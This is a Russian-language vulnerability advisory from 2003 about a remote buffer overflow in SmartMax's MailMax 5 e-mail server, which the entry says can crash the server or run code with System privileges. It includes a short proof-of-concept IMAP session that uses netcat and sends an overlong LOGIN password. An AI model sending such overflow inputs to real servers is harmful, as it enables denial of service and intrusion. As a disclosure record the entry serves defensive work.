Удаленное переполнение буфера в MailMax e-mail server
| Дата публикации: | 16.04.2003 |
| Всего просмотров: | 999 |
| Опасность: | |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
| Описание: | Переполнение буфера обнаружено в SmartMax Software's MailMax e-mail server. Удаленный пользователь может аварийно завершить работу сервера. Также удаленный пользователь может выполнить произвольный код с System привилегиями.
Переполнение происходит, когда удаленный пользователь посылает специально сформированное значение параметра password для команды IMAP Login: nc 127.0.0.1 143 * OK IMAP4rev1 SmartMax IMAPMax 5 Ready 0000 CAPABILITY * CAPABILITY IMAP4rev1 0000 OK CAPABILITY completed 0001 LOGIN "mail@mail.com" "A..[50] ..A" 0001 NO Invalid user name or password. 0001 NO Invalid user name or password.Уязвимость обнаружена в MailMax 5 |
| Ссылки: | Buffer Overflow Vulnerability Found in MailMax Version 5 |